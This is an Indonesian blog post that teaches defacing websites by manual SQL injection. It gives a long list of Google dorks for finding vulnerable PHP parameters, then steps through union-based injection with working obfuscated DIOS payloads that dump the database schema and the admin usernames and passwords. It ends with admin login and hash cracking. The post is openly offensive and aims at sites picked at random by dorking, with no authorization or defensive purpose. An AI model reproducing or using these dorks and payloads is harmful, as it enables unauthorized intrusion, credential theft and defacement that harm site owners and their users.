Assalamualaikum wr.wb
Kali ini saya akan memberikan Tutorial cara Deface
POC SQL manual with DIOS. Oke langsung saja simak
[#] Bahan - Bahan
1. Dork ( di kembangin lagi )
inurl:"merchandise/index.php?cat="
inurl:".php?index="
inurl:".php?CID="
inurl:".php?SID="
inurl:".php?term="
inurl:".php?sellerID="
inurl:".php?func="
inurl:".php?idz="
inurl:".php?opt="
inurl:".php?txtMainNavID="
inurl:".php?main="
inurl:".php?mood&cat="
inurl:".php?ResultGridPage="
inurl:".php?machineid="
inurl:".php?p1="
inurl:".php?uid="
inurl:".php?typeid="
inurl:".php?calls="
inurl:".php?pt="
inurl:".php?q="
inurl:".php?prod_cat_main="
inurl:".php?prod_cat="
inurl:".php?gid="
inurl:".php?psid="
inurl:".php?tid="
inurl:".php?brand="
inurl:".php?catld="
inurl:".php?name="
inurl:".php?c_id="
inurl:".php?s_id="
inurl:".php?p_id="
inurl:".php?subtype="
inurl:".php?cateid="
inurl:".php?catepid="
inurl:".php?pttype="
inurl:".php?statusik="
inurl:".php?aid="
inurl:".php?gid="
inurl:".php?bo_table="
inurl:".php?recordID="
inurl:".php?sel="
inurl:".php?nav_id="
inurl:".php?shopGroupId="
inurl:".php?idsc="
inurl:".php?pc1="
inurl:".php?pno="
inurl:".php?elid="
inurl:".php?for="
inurl:".php?pricat="
inurl:".php?parent_id="
inurl:".php?brand_id="
inurl:".php?pcid="
inurl:".php??product_id="
2.Kuota Yang Cukup(Kalo Kaga Ada
3. Kesabaran :v
4. Niat
5. Kopi,Rokok(Biar Santuy Eaa Coeg)
6. Dios
// Step by step Defacenya //
1. Dorking Dulu Pake Dork Yang Di Atas....
2. Pilih Site Target Yang Kira Kira Vuln...
Gw Pake Site
http://www.sitetarget.co.li/news.php?id=1
3. Cek Vuln Atau Nggaknya..
Caranya Tambain ' Di Target..
Contoh::
http://www.sitetarget.co.li/news.php?id=1
Jadinya..
http://www.sitetarget.co.li/news.php?id=1'
Kalo Vuln Ada Perubahan Dari Site Targetnya...
Misal :: (Your SQL Syntax Blablablabla , Blank , Ada Yang Berubah...)
4. Lanjut Ke Order Bynya..
http://www.sitetarget.co.li/news.php?id=1+order+by+1--+-
(TIDAK ERROR)
Kita Cari Errornya:v
http://www.sitetarget.co.li/news.php?id=1+order+by+2--+-
( TIDAK ERROR )
http://www.sitetarget.co.li/news.php?id=1+order+by+3--+-
( TIDAK ERROR )
http://www.sitetarget.co.li/news.php?id=1+order+by+4--+-
( TIDAK ERROR )
( NAH INI BARU ERROR )
Lanjut Ke Union Select(Karna Kita Kan Dah Tau Tuh Jumlah Kolomnya...)
http://www.sitetarget.co.li/news.php?id=1+union+select+1,2,3,4--+-
Nah... Nongol Nih Angka Cantiknya...
3 , 2
Kita Masukin Diosnya Di angka Cantik Yang Nongol Tadi..
(/*!50000select*/(@x)/*!50000from*/(/*!50000select*/(@x:=0x00),(/*!50000select*/(0)from(information_schema.columns)/*!50000where*/(table_schema=database())and(0x00)in(@x:=/*!50000concat*/+(@x,0x3c62723e,/*!50000table_name*/,0x203a3a20,/*!50000column_name*/))))x)
Jadinya Gini...
http://www.sitetarget.co.li/news.php?id=1+union+select+1,2,(/*!50000select*/(@x)/*!50000from*/(/*!50000select*/(@x:=0x00),(/*!50000select*/(0)from(information_schema.columns)/*!50000where*/(table_schema=database())and(0x00)in(@x:=/*!50000concat*/+(@x,0x3c62723e,/*!50000table_name*/,0x203a3a20,/*!50000column_name*/))))x),4--+-
Next..
Kita Dump User Password adminnya
Caranya..
(/*!50000select*/(@x)from(/*!50000select*/(@x:=0x00),(/*!50000select*/(@x)from(namatabel)where(@x)in(@x:=/*!50000concat*/(0x20,@x,0x3c62723e,namakolom,0x203a3a20,namakolom))))x)
Begini Jadinya eaa
http://www.sitetarget.co.li/news.php?id=1+union+select+1,2,(/*!50000select*/(@x)from(/*!50000select*/(@x:=0x00),(/*!50000select*/(@x)from(admin)where(@x)in(@x:=/*!50000concat*/(0x20,@x,0x3c62723e,username,0x203a3a20,password))))x),4--+-
Nah Kan..
Ketemu User Pasword Adminnya :D
Next Cari Admin Loginnya(adlog)
Kalo Ada..
Langsung ae Login Pake User Password Yang Kita Dapet Tadi..
Kadang.. Passwordnya Harus Di Crack Lagi:v(Sandi Yang Berupa Algoritma" MD5,MD4,MD2,SHA1,Base64 dan banyak Lainnya)
Kalo Udah Berhasil Login..
Sekian Dari Gw Salam heker😎
Tidak ada komentar:
Posting Komentar